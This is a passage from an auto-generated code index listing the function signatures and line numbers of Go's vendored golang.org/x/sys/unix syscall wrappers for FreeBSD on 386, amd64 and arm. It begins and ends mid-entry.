error) { function Chdir (line 489) | func Chdir(path string) (err error) { function Chflags (line 504) | func Chflags(path string, flags int) (err error) { function Chmod (line 519) | func Chmod(path string, mode uint32) (err error) { function Chown (line 534) | func Chown(path string, uid int, gid int) (err error) { function Chroot (line 549) | func Chroot(path string) (err error) { function ClockGettime (line 564) | func ClockGettime(clockid int32, time *Timespec) (err error) { function Close (line 574) | func Close(fd int) (err error) { function Dup (line 584) | func Dup(fd int) (nfd int, err error) { function Dup2 (line 595) | func Dup2(from int, to int) (err error) { function Exit (line 605) | func Exit(code int) { function Faccessat (line 612) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... function Fchdir (line 627) | func Fchdir(fd int) (err error) { function Fchflags (line 637) | func Fchflags(fd int, flags int) (err error) { function Fchmod (line 647) | func Fchmod(fd int, mode uint32) (err error) { function Fchmodat (line 657) | func Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) { function Fchown (line 672) | func Fchown(fd int, uid int, gid int) (err error) { function Fchownat (line 682) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Flock (line 697) | func Flock(fd int, how int) (err error) { function Fpathconf (line 707) | func Fpathconf(fd int, name int) (val int, err error) { function Fstat (line 718) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 728) | func Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 743) | func Fstatfs(fd int, stat *Statfs_t) (err error) { function Fsync (line 753) | func Fsync(fd int) (err error) { function Ftruncate (line 763) | func Ftruncate(fd int, length int64) (err error) { function Getdents (line 773) | func Getdents(fd int, buf []byte) (n int, err error) { function Getdirentries (line 790) | func Getdirentries(fd int, buf []byte, basep *uintptr) (n int, err error) { function Getdtablesize (line 807) | func Getdtablesize() (size int) { function Getegid (line 815) | func Getegid() (egid int) { function Geteuid (line 823) | func Geteuid() (uid int) { function Getgid (line 831) | func Getgid() (gid int) { function Getpgid (line 839) | func Getpgid(pid int) (pgid int, err error) { function Getpgrp (line 850) | func Getpgrp() (pgrp int) { function Getpid (line 858) | func Getpid() (pid int) { function Getppid (line 866) | func Getppid() (ppid int) { function Getpriority (line 874) | func Getpriority(which int, who int) (prio int, err error) { function Getrlimit (line 885) | func Getrlimit(which int, lim *Rlimit) (err error) { function Getrusage (line 895) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 905) | func Getsid(pid int) (sid int, err error) { function Gettimeofday (line 916) | func Gettimeofday(tv *Timeval) (err error) { function Getuid (line 926) | func Getuid() (uid int) { function Issetugid (line 934) | func Issetugid() (tainted bool) { function Kill (line 942) | func Kill(pid int, signum syscall.Signal) (err error) { function Kqueue (line 952) | func Kqueue() (fd int, err error) { function Lchown (line 963) | func Lchown(path string, uid int, gid int) (err error) { function Link (line 978) | func Link(path string, link string) (err error) { function Linkat (line 998) | func Linkat(pathfd int, path string, linkfd int, link string, flags int)... function Listen (line 1018) | func Listen(s int, backlog int) (err error) { function Lstat (line 1028) | func Lstat(path string, stat *Stat_t) (err error) { function Mkdir (line 1043) | func Mkdir(path string, mode uint32) (err error) { function Mkdirat (line 1058) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mkfifo (line 1073) | func Mkfifo(path string, mode uint32) (err error) { function Mknod (line 1088) | func Mknod(path string, mode uint32, dev int) (err error) { function Mknodat (line 1103) | func Mknodat(fd int, path string, mode uint32, dev int) (err error) { function Nanosleep (line 1118) | func Nanosleep(time *Timespec, leftover *Timespec) (err error) { function Open (line 1128) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 1144) | func Openat(dirfd int, path string, mode int, perm uint32) (fd int, err ... function Pathconf (line 1160) | func Pathconf(path string, name int) (val int, err error) { function read (line 1176) | func read(fd int, p []byte) (n int, err error) { function Readlink (line 1193) | func Readlink(path string, buf []byte) (n int, err error) { function Rename (line 1215) | func Rename(from string, to string) (err error) { function Renameat (line 1235) | func Renameat(fromfd int, from string, tofd int, to string) (err error) { function Revoke (line 1255) | func Revoke(path string) (err error) { function Rmdir (line 1270) | func Rmdir(path string) (err error) { function Seek (line 1285) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { function Select (line 1296) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Setegid (line 1307) | func Setegid(egid int) (err error) { function Seteuid (line 1317) | func Seteuid(euid int) (err error) { function Setgid (line 1327) | func Setgid(gid int) (err error) { function Setlogin (line 1337) | func Setlogin(name string) (err error) { function Setpgid (line 1352) | func Setpgid(pid int, pgid int) (err error) { function Setpriority (line 1362) | func Setpriority(which int, who int, prio int) (err error) { function Setregid (line 1372) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 1382) | func Setreuid(ruid int, euid int) (err error) { function Setresgid (line 1392) | func Setresgid(rgid int, egid int, sgid int) (err error) { function Setresuid (line 1402) | func Setresuid(ruid int, euid int, suid int) (err error) { function Setsid (line 1412) | func Setsid() (pid int, err error) { function Settimeofday (line 1423) | func Settimeofday(tp *Timeval) (err error) { function Setuid (line 1433) | func Setuid(uid int) (err error) { function Stat (line 1443) | func Stat(path string, stat *Stat_t) (err error) { function Statfs (line 1458) | func Statfs(path string, stat *Statfs_t) (err error) { function Symlink (line 1473) | func Symlink(path string, link string) (err error) { function Symlinkat (line 1493) | func Symlinkat(oldpath string, newdirfd int, newpath string) (err error) { function Sync (line 1513) | func Sync() (err error) { function Truncate (line 1523) | func Truncate(path string, length int64) (err error) { function Umask (line 1538) | func Umask(newmask int) (oldmask int) { function Undelete (line 1546) | func Undelete(path string) (err error) { function Unlink (line 1561) | func Unlink(path string) (err error) { function Unlinkat (line 1576) | func Unlinkat(dirfd int, path string, flags int) (err error) { function Unmount (line 1591) | func Unmount(path string, flags int) (err error) { function write (line 1606) | func write(fd int, p []byte) (n int, err error) { function mmap (line 1623) | func mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos ... function munmap (line 1634) | func munmap(addr uintptr, length uintptr) (err error) { function accept4 (line 1644) | func accept4(fd int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) ... function utimensat (line 1655) | func utimensat(dirfd int, path string, times *[2]Timespec, flags int) (e... FILE: vendor/golang.org/x/sys/unix/zsyscall_freebsd_386.go function getgroups (line 17) | func getgroups(ngid int, gid *_Gid_t) (n int, err error) { function setgroups (line 28) | func setgroups(ngid int, gid *_Gid_t) (err error) { function wait4 (line 38) | func wait4(pid int, wstatus *_C_int, options int, rusage *Rusage) (wpid ... function accept (line 49) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function bind (line 60) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 70) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function socket (line 80) | func socket(domain int, typ int, proto int) (fd int, err error) { function getsockopt (line 91) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 101) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function getpeername (line 111) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 121) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function Shutdown (line 131) | func Shutdown(s int, how int) (err error) { function socketpair (line 141) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function recvfrom (line 151) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 168) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 184) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 195) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function kevent (line 206) | func kevent(kq int, change unsafe.Pointer, nchange int, event unsafe.Poi... function utimes (line 217) | func utimes(path string, timeval *[2]Timeval) (err error) { function futimes (line 232) | func futimes(fd int, timeval *[2]Timeval) (err error) { function poll (line 242) | func poll(fds *PollFd, nfds int, timeout int) (n int, err error) { function Madvise (line 253) | func Madvise(b []byte, behav int) (err error) { function Mlock (line 269) | func Mlock(b []byte) (err error) { function Mlockall (line 285) | func Mlockall(flags int) (err error) { function Mprotect (line 295) | func Mprotect(b []byte, prot int) (err error) { function Msync (line 311) | func Msync(b []byte, flags int) (err error) { function Munlock (line 327) | func Munlock(b []byte) (err error) { function Munlockall (line 343) | func Munlockall() (err error) { function pipe2 (line 353) | func pipe2(p *[2]_C_int, flags int) (err error) { function Getcwd (line 363) | func Getcwd(buf []byte) (n int, err error) { function ioctl (line 380) | func ioctl(fd int, req uint, arg uintptr) (err error) { function ioctlPtr (line 390) | func ioctlPtr(fd int, req uint, arg unsafe.Pointer) (err error) { function sysctl (line 400) | func sysctl(mib []_C_int, old *byte, oldlen *uintptr, new *byte, newlen ... function ptrace (line 416) | func ptrace(request int, pid int, addr uintptr, data int) (err error) { function ptracePtr (line 426) | func ptracePtr(request int, pid int, addr unsafe.Pointer, data int) (err... function Access (line 436) | func Access(path string, mode uint32) (err error) { function Adjtime (line 451) | func Adjtime(delta *Timeval, olddelta *Timeval) (err error) { function CapEnter (line 461) | func CapEnter() (err error) { function capRightsGet (line 471) | func capRightsGet(version int, fd int, rightsp *CapRights) (err error) { function capRightsLimit (line 481) | func capRightsLimit(fd int, rightsp *CapRights) (err error) { function Chdir (line 491) | func Chdir(path string) (err error) { function Chflags (line 506) | func Chflags(path string, flags int) (err error) { function Chmod (line 521) | func Chmod(path string, mode uint32) (err error) { function Chown (line 536) | func Chown(path string, uid int, gid int) (err error) { function Chroot (line 551) | func Chroot(path string) (err error) { function ClockGettime (line 566) | func ClockGettime(clockid int32, time *Timespec) (err error) { function Close (line 576) | func Close(fd int) (err error) { function Dup (line 586) | func Dup(fd int) (nfd int, err error) { function Dup2 (line 597) | func Dup2(from int, to int) (err error) { function Exit (line 607) | func Exit(code int) { function ExtattrGetFd (line 614) | func ExtattrGetFd(fd int, attrnamespace int, attrname string, data uintp... function ExtattrSetFd (line 630) | func ExtattrSetFd(fd int, attrnamespace int, attrname string, data uintp... function ExtattrDeleteFd (line 646) | func ExtattrDeleteFd(fd int, attrnamespace int, attrname string) (err er... function ExtattrListFd (line 661) | func ExtattrListFd(fd int, attrnamespace int, data uintptr, nbytes int) ... function ExtattrGetFile (line 672) | func ExtattrGetFile(file string, attrnamespace int, attrname string, dat... function ExtattrSetFile (line 693) | func ExtattrSetFile(file string, attrnamespace int, attrname string, dat... function ExtattrDeleteFile (line 714) | func ExtattrDeleteFile(file string, attrnamespace int, attrname string) ... function ExtattrListFile (line 734) | func ExtattrListFile(file string, attrnamespace int, data uintptr, nbyte... function ExtattrGetLink (line 750) | func ExtattrGetLink(link string, attrnamespace int, attrname string, dat... function ExtattrSetLink (line 771) | func ExtattrSetLink(link string, attrnamespace int, attrname string, dat... function ExtattrDeleteLink (line 792) | func ExtattrDeleteLink(link string, attrnamespace int, attrname string) ... function ExtattrListLink (line 812) | func ExtattrListLink(link string, attrnamespace int, data uintptr, nbyte... function Fadvise (line 828) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Faccessat (line 838) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... function Fchdir (line 853) | func Fchdir(fd int) (err error) { function Fchflags (line 863) | func Fchflags(fd int, flags int) (err error) { function Fchmod (line 873) | func Fchmod(fd int, mode uint32) (err error) { function Fchmodat (line 883) | func Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) { function Fchown (line 898) | func Fchown(fd int, uid int, gid int) (err error) { function Fchownat (line 908) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Flock (line 923) | func Flock(fd int, how int) (err error) { function Fpathconf (line 933) | func Fpathconf(fd int, name int) (val int, err error) { function Fstat (line 944) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 954) | func Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 969) | func Fstatfs(fd int, stat *Statfs_t) (err error) { function Fsync (line 979) | func Fsync(fd int) (err error) { function Ftruncate (line 989) | func Ftruncate(fd int, length int64) (err error) { function getdirentries (line 999) | func getdirentries(fd int, buf []byte, basep *uint64) (n int, err error) { function Getdtablesize (line 1016) | func Getdtablesize() (size int) { function Getegid (line 1024) | func Getegid() (egid int) { function Geteuid (line 1032) | func Geteuid() (uid int) { function Getgid (line 1040) | func Getgid() (gid int) { function Getpgid (line 1048) | func Getpgid(pid int) (pgid int, err error) { function Getpgrp (line 1059) | func Getpgrp() (pgrp int) { function Getpid (line 1067) | func Getpid() (pid int) { function Getppid (line 1075) | func Getppid() (ppid int) { function Getpriority (line 1083) | func Getpriority(which int, who int) (prio int, err error) { function Getrlimit (line 1094) | func Getrlimit(which int, lim *Rlimit) (err error) { function Getrusage (line 1104) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 1114) | func Getsid(pid int) (sid int, err error) { function Gettimeofday (line 1125) | func Gettimeofday(tv *Timeval) (err error) { function Getuid (line 1135) | func Getuid() (uid int) { function Issetugid (line 1143) | func Issetugid() (tainted bool) { function Kill (line 1151) | func Kill(pid int, signum syscall.Signal) (err error) { function Kqueue (line 1161) | func Kqueue() (fd int, err error) { function Lchown (line 1172) | func Lchown(path string, uid int, gid int) (err error) { function Link (line 1187) | func Link(path string, link string) (err error) { function Linkat (line 1207) | func Linkat(pathfd int, path string, linkfd int, link string, flags int)... function Listen (line 1227) | func Listen(s int, backlog int) (err error) { function Mkdir (line 1237) | func Mkdir(path string, mode uint32) (err error) { function Mkdirat (line 1252) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mkfifo (line 1267) | func Mkfifo(path string, mode uint32) (err error) { function Mknodat (line 1282) | func Mknodat(fd int, path string, mode uint32, dev uint64) (err error) { function Nanosleep (line 1297) | func Nanosleep(time *Timespec, leftover *Timespec) (err error) { function Open (line 1307) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 1323) | func Openat(fdat int, path string, mode int, perm uint32) (fd int, err e... function Pathconf (line 1339) | func Pathconf(path string, name int) (val int, err error) { function pread (line 1355) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 1372) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function read (line 1389) | func read(fd int, p []byte) (n int, err error) { function Readlink (line 1406) | func Readlink(path string, buf []byte) (n int, err error) { function Readlinkat (line 1428) | func Readlinkat(dirfd int, path string, buf []byte) (n int, err error) { function Rename (line 1450) | func Rename(from string, to string) (err error) { function Renameat (line 1470) | func Renameat(fromfd int, from string, tofd int, to string) (err error) { function Revoke (line 1490) | func Revoke(path string) (err error) { function Rmdir (line 1505) | func Rmdir(path string) (err error) { function Seek (line 1520) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { function Select (line 1531) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Setegid (line 1542) | func Setegid(egid int) (err error) { function Seteuid (line 1552) | func Seteuid(euid int) (err error) { function Setgid (line 1562) | func Setgid(gid int) (err error) { function Setlogin (line 1572) | func Setlogin(name string) (err error) { function Setpgid (line 1587) | func Setpgid(pid int, pgid int) (err error) { function Setpriority (line 1597) | func Setpriority(which int, who int, prio int) (err error) { function Setregid (line 1607) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 1617) | func Setreuid(ruid int, euid int) (err error) { function Setresgid (line 1627) | func Setresgid(rgid int, egid int, sgid int) (err error) { function Setresuid (line 1637) | func Setresuid(ruid int, euid int, suid int) (err error) { function Setsid (line 1647) | func Setsid() (pid int, err error) { function Settimeofday (line 1658) | func Settimeofday(tp *Timeval) (err error) { function Setuid (line 1668) | func Setuid(uid int) (err error) { function Statfs (line 1678) | func Statfs(path string, stat *Statfs_t) (err error) { function Symlink (line 1693) | func Symlink(path string, link string) (err error) { function Symlinkat (line 1713) | func Symlinkat(oldpath string, newdirfd int, newpath string) (err error) { function Sync (line 1733) | func Sync() (err error) { function Truncate (line 1743) | func Truncate(path string, length int64) (err error) { function Umask (line 1758) | func Umask(newmask int) (oldmask int) { function Undelete (line 1766) | func Undelete(path string) (err error) { function Unlink (line 1781) | func Unlink(path string) (err error) { function Unlinkat (line 1796) | func Unlinkat(dirfd int, path string, flags int) (err error) { function Unmount (line 1811) | func Unmount(path string, flags int) (err error) { function write (line 1826) | func write(fd int, p []byte) (n int, err error) { function mmap (line 1843) | func mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos ... function munmap (line 1854) | func munmap(addr uintptr, length uintptr) (err error) { function accept4 (line 1864) | func accept4(fd int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) ... function utimensat (line 1875) | func utimensat(dirfd int, path string, times *[2]Timespec, flags int) (e... FILE: vendor/golang.org/x/sys/unix/zsyscall_freebsd_amd64.go function getgroups (line 17) | func getgroups(ngid int, gid *_Gid_t) (n int, err error) { function setgroups (line 28) | func setgroups(ngid int, gid *_Gid_t) (err error) { function wait4 (line 38) | func wait4(pid int, wstatus *_C_int, options int, rusage *Rusage) (wpid ... function accept (line 49) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function bind (line 60) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 70) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function socket (line 80) | func socket(domain int, typ int, proto int) (fd int, err error) { function getsockopt (line 91) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 101) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function getpeername (line 111) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 121) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function Shutdown (line 131) | func Shutdown(s int, how int) (err error) { function socketpair (line 141) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function recvfrom (line 151) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 168) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 184) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 195) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function kevent (line 206) | func kevent(kq int, change unsafe.Pointer, nchange int, event unsafe.Poi... function utimes (line 217) | func utimes(path string, timeval *[2]Timeval) (err error) { function futimes (line 232) | func futimes(fd int, timeval *[2]Timeval) (err error) { function poll (line 242) | func poll(fds *PollFd, nfds int, timeout int) (n int, err error) { function Madvise (line 253) | func Madvise(b []byte, behav int) (err error) { function Mlock (line 269) | func Mlock(b []byte) (err error) { function Mlockall (line 285) | func Mlockall(flags int) (err error) { function Mprotect (line 295) | func Mprotect(b []byte, prot int) (err error) { function Msync (line 311) | func Msync(b []byte, flags int) (err error) { function Munlock (line 327) | func Munlock(b []byte) (err error) { function Munlockall (line 343) | func Munlockall() (err error) { function pipe2 (line 353) | func pipe2(p *[2]_C_int, flags int) (err error) { function Getcwd (line 363) | func Getcwd(buf []byte) (n int, err error) { function ioctl (line 380) | func ioctl(fd int, req uint, arg uintptr) (err error) { function ioctlPtr (line 390) | func ioctlPtr(fd int, req uint, arg unsafe.Pointer) (err error) { function sysctl (line 400) | func sysctl(mib []_C_int, old *byte, oldlen *uintptr, new *byte, newlen ... function ptrace (line 416) | func ptrace(request int, pid int, addr uintptr, data int) (err error) { function ptracePtr (line 426) | func ptracePtr(request int, pid int, addr unsafe.Pointer, data int) (err... function Access (line 436) | func Access(path string, mode uint32) (err error) { function Adjtime (line 451) | func Adjtime(delta *Timeval, olddelta *Timeval) (err error) { function CapEnter (line 461) | func CapEnter() (err error) { function capRightsGet (line 471) | func capRightsGet(version int, fd int, rightsp *CapRights) (err error) { function capRightsLimit (line 481) | func capRightsLimit(fd int, rightsp *CapRights) (err error) { function Chdir (line 491) | func Chdir(path string) (err error) { function Chflags (line 506) | func Chflags(path string, flags int) (err error) { function Chmod (line 521) | func Chmod(path string, mode uint32) (err error) { function Chown (line 536) | func Chown(path string, uid int, gid int) (err error) { function Chroot (line 551) | func Chroot(path string) (err error) { function ClockGettime (line 566) | func ClockGettime(clockid int32, time *Timespec) (err error) { function Close (line 576) | func Close(fd int) (err error) { function Dup (line 586) | func Dup(fd int) (nfd int, err error) { function Dup2 (line 597) | func Dup2(from int, to int) (err error) { function Exit (line 607) | func Exit(code int) { function ExtattrGetFd (line 614) | func ExtattrGetFd(fd int, attrnamespace int, attrname string, data uintp... function ExtattrSetFd (line 630) | func ExtattrSetFd(fd int, attrnamespace int, attrname string, data uintp... function ExtattrDeleteFd (line 646) | func ExtattrDeleteFd(fd int, attrnamespace int, attrname string) (err er... function ExtattrListFd (line 661) | func ExtattrListFd(fd int, attrnamespace int, data uintptr, nbytes int) ... function ExtattrGetFile (line 672) | func ExtattrGetFile(file string, attrnamespace int, attrname string, dat... function ExtattrSetFile (line 693) | func ExtattrSetFile(file string, attrnamespace int, attrname string, dat... function ExtattrDeleteFile (line 714) | func ExtattrDeleteFile(file string, attrnamespace int, attrname string) ... function ExtattrListFile (line 734) | func ExtattrListFile(file string, attrnamespace int, data uintptr, nbyte... function ExtattrGetLink (line 750) | func ExtattrGetLink(link string, attrnamespace int, attrname string, dat... function ExtattrSetLink (line 771) | func ExtattrSetLink(link string, attrnamespace int, attrname string, dat... function ExtattrDeleteLink (line 792) | func ExtattrDeleteLink(link string, attrnamespace int, attrname string) ... function ExtattrListLink (line 812) | func ExtattrListLink(link string, attrnamespace int, data uintptr, nbyte... function Fadvise (line 828) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Faccessat (line 838) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... function Fchdir (line 853) | func Fchdir(fd int) (err error) { function Fchflags (line 863) | func Fchflags(fd int, flags int) (err error) { function Fchmod (line 873) | func Fchmod(fd int, mode uint32) (err error) { function Fchmodat (line 883) | func Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) { function Fchown (line 898) | func Fchown(fd int, uid int, gid int) (err error) { function Fchownat (line 908) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Flock (line 923) | func Flock(fd int, how int) (err error) { function Fpathconf (line 933) | func Fpathconf(fd int, name int) (val int, err error) { function Fstat (line 944) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 954) | func Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 969) | func Fstatfs(fd int, stat *Statfs_t) (err error) { function Fsync (line 979) | func Fsync(fd int) (err error) { function Ftruncate (line 989) | func Ftruncate(fd int, length int64) (err error) { function getdirentries (line 999) | func getdirentries(fd int, buf []byte, basep *uint64) (n int, err error) { function Getdtablesize (line 1016) | func Getdtablesize() (size int) { function Getegid (line 1024) | func Getegid() (egid int) { function Geteuid (line 1032) | func Geteuid() (uid int) { function Getgid (line 1040) | func Getgid() (gid int) { function Getpgid (line 1048) | func Getpgid(pid int) (pgid int, err error) { function Getpgrp (line 1059) | func Getpgrp() (pgrp int) { function Getpid (line 1067) | func Getpid() (pid int) { function Getppid (line 1075) | func Getppid() (ppid int) { function Getpriority (line 1083) | func Getpriority(which int, who int) (prio int, err error) { function Getrlimit (line 1094) | func Getrlimit(which int, lim *Rlimit) (err error) { function Getrusage (line 1104) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 1114) | func Getsid(pid int) (sid int, err error) { function Gettimeofday (line 1125) | func Gettimeofday(tv *Timeval) (err error) { function Getuid (line 1135) | func Getuid() (uid int) { function Issetugid (line 1143) | func Issetugid() (tainted bool) { function Kill (line 1151) | func Kill(pid int, signum syscall.Signal) (err error) { function Kqueue (line 1161) | func Kqueue() (fd int, err error) { function Lchown (line 1172) | func Lchown(path string, uid int, gid int) (err error) { function Link (line 1187) | func Link(path string, link string) (err error) { function Linkat (line 1207) | func Linkat(pathfd int, path string, linkfd int, link string, flags int)... function Listen (line 1227) | func Listen(s int, backlog int) (err error) { function Mkdir (line 1237) | func Mkdir(path string, mode uint32) (err error) { function Mkdirat (line 1252) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mkfifo (line 1267) | func Mkfifo(path string, mode uint32) (err error) { function Mknodat (line 1282) | func Mknodat(fd int, path string, mode uint32, dev uint64) (err error) { function Nanosleep (line 1297) | func Nanosleep(time *Timespec, leftover *Timespec) (err error) { function Open (line 1307) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 1323) | func Openat(fdat int, path string, mode int, perm uint32) (fd int, err e... function Pathconf (line 1339) | func Pathconf(path string, name int) (val int, err error) { function pread (line 1355) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 1372) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function read (line 1389) | func read(fd int, p []byte) (n int, err error) { function Readlink (line 1406) | func Readlink(path string, buf []byte) (n int, err error) { function Readlinkat (line 1428) | func Readlinkat(dirfd int, path string, buf []byte) (n int, err error) { function Rename (line 1450) | func Rename(from string, to string) (err error) { function Renameat (line 1470) | func Renameat(fromfd int, from string, tofd int, to string) (err error) { function Revoke (line 1490) | func Revoke(path string) (err error) { function Rmdir (line 1505) | func Rmdir(path string) (err error) { function Seek (line 1520) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { function Select (line 1531) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Setegid (line 1542) | func Setegid(egid int) (err error) { function Seteuid (line 1552) | func Seteuid(euid int) (err error) { function Setgid (line 1562) | func Setgid(gid int) (err error) { function Setlogin (line 1572) | func Setlogin(name string) (err error) { function Setpgid (line 1587) | func Setpgid(pid int, pgid int) (err error) { function Setpriority (line 1597) | func Setpriority(which int, who int, prio int) (err error) { function Setregid (line 1607) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 1617) | func Setreuid(ruid int, euid int) (err error) { function Setresgid (line 1627) | func Setresgid(rgid int, egid int, sgid int) (err error) { function Setresuid (line 1637) | func Setresuid(ruid int, euid int, suid int) (err error) { function Setsid (line 1647) | func Setsid() (pid int, err error) { function Settimeofday (line 1658) | func Settimeofday(tp *Timeval) (err error) { function Setuid (line 1668) | func Setuid(uid int) (err error) { function Statfs (line 1678) | func Statfs(path string, stat *Statfs_t) (err error) { function Symlink (line 1693) | func Symlink(path string, link string) (err error) { function Symlinkat (line 1713) | func Symlinkat(oldpath string, newdirfd int, newpath string) (err error) { function Sync (line 1733) | func Sync() (err error) { function Truncate (line 1743) | func Truncate(path string, length int64) (err error) { function Umask (line 1758) | func Umask(newmask int) (oldmask int) { function Undelete (line 1766) | func Undelete(path string) (err error) { function Unlink (line 1781) | func Unlink(path string) (err error) { function Unlinkat (line 1796) | func Unlinkat(dirfd int, path string, flags int) (err error) { function Unmount (line 1811) | func Unmount(path string, flags int) (err error) { function write (line 1826) | func write(fd int, p []byte) (n int, err error) { function mmap (line 1843) | func mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos ... function munmap (line 1854) | func munmap(addr uintptr, length uintptr) (err error) { function accept4 (line 1864) | func accept4(fd int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) ... function utimensat (line 1875) | func utimensat(dirfd int, path string, times *[2]Timespec, flags int) (e... FILE: vendor/golang.org/x/sys/unix/zsyscall_freebsd_arm.go function getgroups (line 17) | func getgroups(ngid int, gid *_Gid_t) (n int, err error) { function setgroups (line 28) | func setgroups(ngid int, gid *_Gid_t) (err error) { function wait4 (line 38) | func wait4(pid int, wstatus *_C_int, options int, rusage *Rusage) (wpid ... function accept (line 49) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function bind (line 60) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 70) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function socket (line 80) | func socket(domain int, typ int, proto int) (fd int, err error) { function getsockopt (line 91) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 101) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function getpeername (line 111) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 121) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function Shutdown (line 131) | func Shutdown(s int, how int) (err error) { function socketpair (line 141) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function recvfrom (line 151) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 168) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 184) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 195) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function kevent (line 206) | func kevent(kq int, change unsafe.Pointer, nchange int, event unsafe.Poi... function utimes (line 217) | func utimes(path string, timeval *[2]Timeval) (err error) { function futimes (line 232) | func futimes(fd int, timeval *[2]Timeval) (err error) { function poll (line 242) | func poll(fds *PollFd, nfds int, timeout int) (n int, err error) { function Madvise (line 253) | func Madvise(b []byte, behav int) (err error) { function Mlock (line 269) | func Mlock(b []byte) (err error) { function Mlockall (line 285) | func Mlockall(flags int) (err error) { function Mprotect (line 295) | func Mprotect(b []byte, prot int) (err error) { function Msync (line 311) | func Msync(b []byte, flags int) (err error) { function Munlock (line 327) | func Munlock(b []byte) (err error) { function Munlockall (line 343) | func Munlockall() (err error) { function pipe2 (line 353) | func pipe2(p *[2]_C_int, flags int) (err error) { function Getcwd (line 363) | func Getcwd(buf []byte) (n int, err error) { function ioctl (line 380) | func ioctl(fd int, req uint, arg uintptr) (err error) { function ioctlPtr (line 390) | func ioctlPtr(fd int, 